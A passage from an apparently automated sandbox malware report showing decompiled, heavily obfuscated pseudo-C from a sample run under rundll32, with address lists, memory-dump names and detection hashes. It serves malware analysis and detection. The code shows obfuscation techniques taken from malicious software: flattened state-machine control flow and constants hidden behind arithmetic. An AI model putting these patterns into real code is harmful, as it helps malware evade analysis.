				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E0038DCF7(_v148, 0x371540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E0037A42D(0xab2a8d8a, 0x2b7)))();
								E0037A8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E00380AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E003780E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E00388519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E00377FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E00374816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                                                            0x0038a666
                                                                                                                                                            0x0038a666
                                                                                                                                                            0x0038a670
                                                                                                                                                            0x0038a674
                                                                                                                                                            0x0038a67e
                                                                                                                                                            0x0038a68b
                                                                                                                                                            0x0038a68f
                                                                                                                                                            0x0038a694
                                                                                                                                                            0x0038a699
                                                                                                                                                            0x0038a6a1
                                                                                                                                                            0x0038a6a9
                                                                                                                                                            0x0038a6b1
                                                                                                                                                            0x0038a6b9
                                                                                                                                                            0x0038a6c1
                                                                                                                                                            0x0038a6c6
                                                                                                                                                            0x0038a6ce
                                                                                                                                                            0x0038a6d6
                                                                                                                                                            0x0038a6de
                                                                                                                                                            0x0038a6e6
                                                                                                                                                            0x0038a6ea
                                                                                                                                                            0x0038a6ef
                                                                                                                                                            0x0038a6f7
                                                                                                                                                            0x0038a706
                                                                                                                                                            0x0038a709
                                                                                                                                                            0x0038a70d
                                                                                                                                                            0x0038a715
                                                                                                                                                            0x0038a71d
                                                                                                                                                            0x0038a722
                                                                                                                                                            0x0038a732
                                                                                                                                                            0x0038a736
                                                                                                                                                            0x0038a73e
                                                                                                                                                            0x0038a746
                                                                                                                                                            0x0038a74e
                                                                                                                                                            0x0038a756
                                                                                                                                                            0x0038a75e
                                                                                                                                                            0x0038a766
                                                                                                                                                            0x0038a76e
                                                                                                                                                            0x0038a776
                                                                                                                                                            0x0038a783
                                                                                                                                                            0x0038a786
                                                                                                                                                            0x0038a78a
                                                                                                                                                            0x0038a792
                                                                                                                                                            0x0038a79a
                                                                                                                                                            0x0038a7a2
                                                                                                                                                            0x0038a7aa
                                                                                                                                                            0x0038a7b2
                                                                                                                                                            0x0038a7ba
                                                                                                                                                            0x0038a7c2
                                                                                                                                                            0x0038a7cf
                                                                                                                                                            0x0038a7d3
                                                                                                                                                            0x0038a7db
                                                                                                                                                            0x0038a7e3
                                                                                                                                                            0x0038a7eb
                                                                                                                                                            0x0038a7f3
                                                                                                                                                            0x0038a7f8
                                                                                                                                                            0x0038a800
                                                                                                                                                            0x0038a810
                                                                                                                                                            0x0038a818
                                                                                                                                                            0x0038a81b
                                                                                                                                                            0x0038a81f
                                                                                                                                                            0x0038a827
                                                                                                                                                            0x0038a82f
                                                                                                                                                            0x0038a83c
                                                                                                                                                            0x0038a842
                                                                                                                                                            0x0038a847
                                                                                                                                                            0x0038a84f
                                                                                                                                                            0x0038a857
                                                                                                                                                            0x0038a85c
                                                                                                                                                            0x0038a864
                                                                                                                                                            0x0038a86c
                                                                                                                                                            0x0038a874
                                                                                                                                                            0x0038a879
                                                                                                                                                            0x0038a881
                                                                                                                                                            0x0038a890
                                                                                                                                                            0x0038a891
                                                                                                                                                            0x0038a895
                                                                                                                                                            0x0038a89d
                                                                                                                                                            0x0038a8ab
                                                                                                                                                            0x0038a8af
                                                                                                                                                            0x0038a8b3
                                                                                                                                                            0x0038a8b7
                                                                                                                                                            0x0038a8bb
                                                                                                                                                            0x0038a8c3
                                                                                                                                                            0x0038a8cb
                                                                                                                                                            0x0038a8cb
                                                                                                                                                            0x0038a8cb
                                                                                                                                                            0x0038a8d0
                                                                                                                                                            0x0038a8d0
                                                                                                                                                            0x0038a8de
                                                                                                                                                            0x0038a983
                                                                                                                                                            0x0038a98c
                                                                                                                                                            0x0038a994
                                                                                                                                                            0x0038a99b
                                                                                                                                                            0x0038a9a7
                                                                                                                                                            0x0038a9a8
                                                                                                                                                            0x0038a9a9
                                                                                                                                                            0x0038a9aa
                                                                                                                                                            0x0038a9b6
                                                                                                                                                            0x0038a9c2
                                                                                                                                                            0x0038a9c7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a8e4
                                                                                                                                                            0x0038a8ea
                                                                                                                                                            0x0038a952
                                                                                                                                                            0x0038a957
                                                                                                                                                            0x0038a95f
                                                                                                                                                            0x0038a969
                                                                                                                                                            0x0038a96a
                                                                                                                                                            0x0038a96b
                                                                                                                                                            0x0038a96d
                                                                                                                                                            0x0038a972
                                                                                                                                                            0x0038a977
                                                                                                                                                            0x0038a977
                                                                                                                                                            0x0038a97a
                                                                                                                                                            0x0038a97a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a8ec
                                                                                                                                                            0x0038a8f2
                                                                                                                                                            0x0038a93f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a8f4
                                                                                                                                                            0x0038a8fa
                                                                                                                                                            0x0038aa1d
                                                                                                                                                            0x0038a900
                                                                                                                                                            0x0038a906
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a90c
                                                                                                                                                            0x0038a910
                                                                                                                                                            0x0038a91f
                                                                                                                                                            0x0038a920
                                                                                                                                                            0x0038a926
                                                                                                                                                            0x0038a930
                                                                                                                                                            0x0038a936
                                                                                                                                                            0x0038a93a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a93a
                                                                                                                                                            0x0038a906
                                                                                                                                                            0x0038a8fa
                                                                                                                                                            0x0038a8f2
                                                                                                                                                            0x0038a8ea
                                                                                                                                                            0x0038aa26
                                                                                                                                                            0x0038aa2f
                                                                                                                                                            0x0038aa2f
                                                                                                                                                            0x0038a9e8
                                                                                                                                                            0x0038a9ea
                                                                                                                                                            0x0038a9ed
                                                                                                                                                            0x0038a9ef
                                                                                                                                                            0x0038a9f8
                                                                                                                                                            0x0038a9fc
                                                                                                                                                            0x0038aa01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x0038aa06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038aa12

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ^4?$iQ
                                                                                                                                                            • API String ID: 0-3971506469
                                                                                                                                                            • Opcode ID: f1484d1be04cb0755c3c51ebf2b8c2ac789e0f84743a2339c0737415eeda01c6
                                                                                                                                                            • Instruction ID: 96217a39bdc5d9392793f20f4e271625f7ff46d66880ff0382e14469f81739df
                                                                                                                                                            • Opcode Fuzzy Hash: f1484d1be04cb0755c3c51ebf2b8c2ac789e0f84743a2339c0737415eeda01c6
                                                                                                                                                            • Instruction Fuzzy Hash: 19A162719083409FD354DF29C58990BFBE0BBC4718F41892EF99AAA260C7B5D949CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00388BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E00388BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x393e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E003780E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E0038D25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E00380AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E003780E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E00380AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E003780E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E003780E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                                                            0x00388be9
                                                                                                                                                            0x00388bf9
                                                                                                                                                            0x00388bfa
                                                                                                                                                            0x00388c01
                                                                                                                                                            0x00388c04
                                                                                                                                                            0x00388c05
                                                                                                                                                            0x00388c06
                                                                                                                                                            0x00388c0c
                                                                                                                                                            0x00388c13
                                                                                                                                                            0x00388c16
                                                                                                                                                            0x00388c1d
                                                                                                                                                            0x00388c24
                                                                                                                                                            0x00388c2b
                                                                                                                                                            0x00388c32
                                                                                                                                                            0x00388c40
                                                                                                                                                            0x00388c47
                                                                                                                                                            0x00388c4a
                                                                                                                                                            0x00388c4d
                                                                                                                                                            0x00388c54
                                                                                                                                                            0x00388c5b
                                                                                                                                                            0x00388c69
                                                                                                                                                            0x00388c6c
                                                                                                                                                            0x00388c73
                                                                                                                                                            0x00388c7a
                                                                                                                                                            0x00388c81
                                                                                                                                                            0x00388c85
                                                                                                                                                            0x00388c8c
                                                                                                                                                            0x00388c93
                                                                                                                                                            0x00388c9a
                                                                                                                                                            0x00388c9e
                                                                                                                                                            0x00388ca5
                                                                                                                                                            0x00388cac
                                                                                                                                                            0x00388cb4
                                                                                                                                                            0x00388cb7
                                                                                                                                                            0x00388cba
                                                                                                                                                            0x00388cc1
                                                                                                                                                            0x00388ccf
                                                                                                                                                            0x00388cd2
                                                                                                                                                            0x00388cd9
                                                                                                                                                            0x00388ce0
                                                                                                                                                            0x00388ce7
                                                                                                                                                            0x00388cee
                                                                                                                                                            0x00388cf5
                                                                                                                                                            0x00388cff
                                                                                                                                                            0x00388d02
                                                                                                                                                            0x00388d05
                                                                                                                                                            0x00388d0c
                                                                                                                                                            0x00388d13
                                                                                                                                                            0x00388d17
                                                                                                                                                            0x00388d1e
                                                                                                                                                            0x00388d25
                                                                                                                                                            0x00388d2c
                                                                                                                                                            0x00388d33
                                                                                                                                                            0x00388d3a
                                                                                                                                                            0x00388d3e
                                                                                                                                                            0x00388d42
                                                                                                                                                            0x00388d49
                                                                                                                                                            0x00388d50
                                                                                                                                                            0x00388d57
                                                                                                                                                            0x00388d5b
                                                                                                                                                            0x00388d64
                                                                                                                                                            0x00388d6b
                                                                                                                                                            0x00388d78
                                                                                                                                                            0x00388d7b
                                                                                                                                                            0x00388d7e
                                                                                                                                                            0x00388d85
                                                                                                                                                            0x00388d93
                                                                                                                                                            0x00388d96
                                                                                                                                                            0x00388d9d
                                                                                                                                                            0x00388da4
                                                                                                                                                            0x00388dae
                                                                                                                                                            0x00388db1
                                                                                                                                                            0x00388db4
                                                                                                                                                            0x00388dbb
                                                                                                                                                            0x00388dc2
                                                                                                                                                            0x00388dc9
                                                                                                                                                            0x00388dd0
                                                                                                                                                            0x00388dd7
                                                                                                                                                            0x00388dde
                                                                                                                                                            0x00388de5
                                                                                                                                                            0x00388dec
                                                                                                                                                            0x00388df7
                                                                                                                                                            0x00388dfa
                                                                                                                                                            0x00388e01
                                                                                                                                                            0x00388e08
                                                                                                                                                            0x00388e0f
                                                                                                                                                            0x00388e16
                                                                                                                                                            0x00388e1a
                                                                                                                                                            0x00388e1e
                                                                                                                                                            0x00388e25
                                                                                                                                                            0x00388e25
                                                                                                                                                            0x00388e33
                                                                                                                                                            0x00388ef3
                                                                                                                                                            0x00388efc
                                                                                                                                                            0x00388efd
                                                                                                                                                            0x00388eff
                                                                                                                                                            0x00388f01
                                                                                                                                                            0x00388f0b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388f0b
                                                                                                                                                            0x00388e3f
                                                                                                                                                            0x00388e8c
                                                                                                                                                            0x00388e91
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388e91
                                                                                                                                                            0x00388e47
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00388e57
                                                                                                                                                            0x00388e5c
                                                                                                                                                            0x00388e62
                                                                                                                                                            0x00388e67
                                                                                                                                                            0x00388e68
                                                                                                                                                            0x00388e69
                                                                                                                                                            0x00388e6b
                                                                                                                                                            0x00388e70
                                                                                                                                                            0x00388e73
                                                                                                                                                            0x00388e76
                                                                                                                                                            0x00388e7d
                                                                                                                                                            0x00388e7e
                                                                                                                                                            0x00388e81
                                                                                                                                                            0x00388e81
                                                                                                                                                            0x00388ea2
                                                                                                                                                            0x00388ea7
                                                                                                                                                            0x00388ead
                                                                                                                                                            0x00388eb2
                                                                                                                                                            0x00388eb3
                                                                                                                                                            0x00388eb5
                                                                                                                                                            0x00388eb7
                                                                                                                                                            0x00388ebc
                                                                                                                                                            0x00388ec2
                                                                                                                                                            0x00388ec8
                                                                                                                                                            0x00388ec9
                                                                                                                                                            0x00388eca
                                                                                                                                                            0x00388ecc
                                                                                                                                                            0x00388ed1
                                                                                                                                                            0x00388ed4
                                                                                                                                                            0x00388ed7
                                                                                                                                                            0x00388ede
                                                                                                                                                            0x00388edf
                                                                                                                                                            0x00388ee2
                                                                                                                                                            0x00388ee5
                                                                                                                                                            0x00388ee5
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ulG$wV
                                                                                                                                                            • API String ID: 0-391097709
                                                                                                                                                            • Opcode ID: 70976c996b03bc686988bd41861860908097d0c82c60c6b68d257156c33f3412
                                                                                                                                                            • Instruction ID: cabb98a6f98f5d9ee46259b30994d1619185b57959e77a328ef04f68f3d7c61f
                                                                                                                                                            • Opcode Fuzzy Hash: 70976c996b03bc686988bd41861860908097d0c82c60c6b68d257156c33f3412
                                                                                                                                                            • Instruction Fuzzy Hash: 55917471D00319EBCB14DFE9D88A9DEBBB1FF44314F208149E216BA290C7B41A45CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00376D24 Relevance: 2.7, Strings: 2, Instructions: 164COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00376D24() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				short* _t158;
				void* _t161;
				void* _t164;
				intOrPtr _t173;
				intOrPtr _t188;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				void* _t198;

				_v556 = 0x5b9523;
				_v556 = _v556 ^ 0xd644881d;
				_t164 = 0xafec1cc;
				_v556 = _v556 ^ 0xd61fc18a;
				_v560 = 0xf0211a;
				_v560 = _v560 >> 0xc;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 ^ 0x000d86e8;
				_v536 = 0x5b86ee;
				_t192 = 0x7a;
				_v536 = _v536 / _t192;
				_v536 = _v536 ^ 0x00051f37;
				_v528 = 0x15dba1;
				_v528 = _v528 + 0xffff3226;
				_v528 = _v528 ^ 0x001c60e6;
				_v564 = 0xcdfacc;
				_v564 = _v564 ^ 0x78a7d3e3;
				_v564 = _v564 << 0xe;
				_v564 = _v564 ^ 0x8a48a6fd;
				_v572 = 0x7eccf1;
				_v572 = _v572 + 0xffffd1bc;
				_t193 = 0x2e;
				_v572 = _v572 * 0x26;
				_v572 = _v572 ^ 0x12c53124;
				_v588 = 0x8dc921;
				_v588 = _v588 | 0x53df5653;
				_v588 = _v588 << 7;
				_v588 = _v588 * 0x73;
				_v588 = _v588 ^ 0xc8beb34e;
				_v544 = 0xe1fa74;
				_v544 = _v544 + 0xffffe6ac;
				_v544 = _v544 ^ 0x00e0f2b8;
				_v568 = 0x925246;
				_v568 = _v568 + 0xffffcd65;
				_v568 = _v568 + 0xffffdee0;
				_v568 = _v568 ^ 0x009eae97;
				_v576 = 0x3c09b4;
				_v576 = _v576 + 0xffff2c4c;
				_v576 = _v576 >> 0xa;
				_v576 = _v576 ^ 0x000cc2c3;
				_v592 = 0xac7846;
				_v592 = _v592 ^ 0xbb2572b9;
				_v592 = _v592 ^ 0xeb3265e6;
				_v592 = _v592 | 0x6a541c4b;
				_v592 = _v592 ^ 0x7af30806;
				_v548 = 0xb1a24a;
				_v548 = _v548 / _t193;
				_v548 = _v548 ^ 0x00094ccb;
				_v552 = 0xbe5b93;
				_v552 = _v552 | 0xe01e3375;
				_v552 = _v552 ^ 0xe0b0d42a;
				_v532 = 0x76dce5;
				_t194 = 0x19;
				_v532 = _v532 / _t194;
				_v532 = _v532 ^ 0x00002403;
				_v584 = 0xffb3b0;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x8b2427a7;
				_v584 = _v584 | 0x0ff5fda2;
				_v584 = _v584 ^ 0x7ffdbf2b;
				_v580 = 0x6f9ecd;
				_t195 = 0x5b;
				_v580 = _v580 / _t195;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x13a22276;
				_v540 = 0xd8d341;
				_v540 = _v540 * 0xb;
				_v540 = _v540 ^ 0x095c7847;
				do {
					while(_t164 != 0x2dc4ff7) {
						if(_t164 == 0x5cfc1e4) {
							return E00379DCF(_v532, _v584, _v580,  &_v524,  &_v524, E00374EE3, _v540, 0);
						}
						if(_t164 == 0x9efe9dd) {
							_push(_v536);
							_push(_v560);
							_t161 = E0038DCF7(_v556, 0x371000, __eflags);
							_t173 =  *0x393e10; // 0x0
							_t188 =  *0x393e10; // 0x0
							E003747CE(_t188 + 0x23c, _v528, _t173 + 0x1c, _v564, _v572, _t161, _t173 + 0x1c, _v588, _v544);
							_t158 = E0037A8B0(_v568, _t161, _v576);
							_t198 = _t198 + 0x24;
							_t164 = 0x2dc4ff7;
							continue;
						}
						if(_t164 != 0xafec1cc) {
							goto L8;
						}
						_t164 = 0x9efe9dd;
					}
					_t158 = E0037B6CF( &_v524, _v592, _v548, _v552);
					__eflags = 0;
					 *_t158 = 0;
					_t164 = 0x5cfc1e4;
					L8:
					__eflags = _t164 - 0xdc02af8;
				} while (__eflags != 0);
				return _t158;
			}































                                                                                                                                                            0x00376d2a
                                                                                                                                                            0x00376d34
                                                                                                                                                            0x00376d3c
                                                                                                                                                            0x00376d41
                                                                                                                                                            0x00376d49
                                                                                                                                                            0x00376d51
                                                                                                                                                            0x00376d56
                                                                                                                                                            0x00376d5b
                                                                                                                                                            0x00376d63
                                                                                                                                                            0x00376d75
                                                                                                                                                            0x00376d7a
                                                                                                                                                            0x00376d80
                                                                                                                                                            0x00376d88
                                                                                                                                                            0x00376d90
                                                                                                                                                            0x00376d98
                                                                                                                                                            0x00376da0
                                                                                                                                                            0x00376da8
                                                                                                                                                            0x00376db0
                                                                                                                                                            0x00376db5
                                                                                                                                                            0x00376dbd
                                                                                                                                                            0x00376dc5
                                                                                                                                                            0x00376dd2
                                                                                                                                                            0x00376dd5
                                                                                                                                                            0x00376dd9
                                                                                                                                                            0x00376de1
                                                                                                                                                            0x00376de9
                                                                                                                                                            0x00376df1
                                                                                                                                                            0x00376dfb
                                                                                                                                                            0x00376dff
                                                                                                                                                            0x00376e07
                                                                                                                                                            0x00376e0f
                                                                                                                                                            0x00376e17
                                                                                                                                                            0x00376e1f
                                                                                                                                                            0x00376e27
                                                                                                                                                            0x00376e2f
                                                                                                                                                            0x00376e37
                                                                                                                                                            0x00376e3f
                                                                                                                                                            0x00376e47
                                                                                                                                                            0x00376e4f
                                                                                                                                                            0x00376e54
                                                                                                                                                            0x00376e5c
                                                                                                                                                            0x00376e64
                                                                                                                                                            0x00376e6c
                                                                                                                                                            0x00376e74
                                                                                                                                                            0x00376e7c
                                                                                                                                                            0x00376e84
                                                                                                                                                            0x00376e94
                                                                                                                                                            0x00376e98
                                                                                                                                                            0x00376ea0
                                                                                                                                                            0x00376ea8
                                                                                                                                                            0x00376eb0
                                                                                                                                                            0x00376eb8
                                                                                                                                                            0x00376ec4
                                                                                                                                                            0x00376ec7
                                                                                                                                                            0x00376ecb
                                                                                                                                                            0x00376ed3
                                                                                                                                                            0x00376edb
                                                                                                                                                            0x00376ee0
                                                                                                                                                            0x00376ee8
                                                                                                                                                            0x00376ef0
                                                                                                                                                            0x00376efa
                                                                                                                                                            0x00376f08
                                                                                                                                                            0x00376f15
                                                                                                                                                            0x00376f1e
                                                                                                                                                            0x00376f23
                                                                                                                                                            0x00376f2b
                                                                                                                                                            0x00376f38
                                                                                                                                                            0x00376f3c
                                                                                                                                                            0x00376f44
                                                                                                                                                            0x00376f44
                                                                                                                                                            0x00376f4e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037701e
                                                                                                                                                            0x00376f56
                                                                                                                                                            0x00376f68
                                                                                                                                                            0x00376f71
                                                                                                                                                            0x00376f79
                                                                                                                                                            0x00376f8a
                                                                                                                                                            0x00376fa2
                                                                                                                                                            0x00376fb2
                                                                                                                                                            0x00376fc1
                                                                                                                                                            0x00376fc6
                                                                                                                                                            0x00376fc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376fc9
                                                                                                                                                            0x00376f5e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376f64
                                                                                                                                                            0x00376f64
                                                                                                                                                            0x00376fe0
                                                                                                                                                            0x00376fe7
                                                                                                                                                            0x00376fe9
                                                                                                                                                            0x00376fec
                                                                                                                                                            0x00376fee
                                                                                                                                                            0x00376fee
                                                                                                                                                            0x00376fee
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Gx\$e2
                                                                                                                                                            • API String ID: 0-3912940318
                                                                                                                                                            • Opcode ID: 684a4d32d7f8719bfa44206250378e0d0e495ee7bb642b2139c129793b45ab7e
                                                                                                                                                            • Instruction ID: b039146e7b4bb5bda198057bf13ec323d954208c168c2c2d699cdb01f3c3dcc7
                                                                                                                                                            • Opcode Fuzzy Hash: 684a4d32d7f8719bfa44206250378e0d0e495ee7bb642b2139c129793b45ab7e
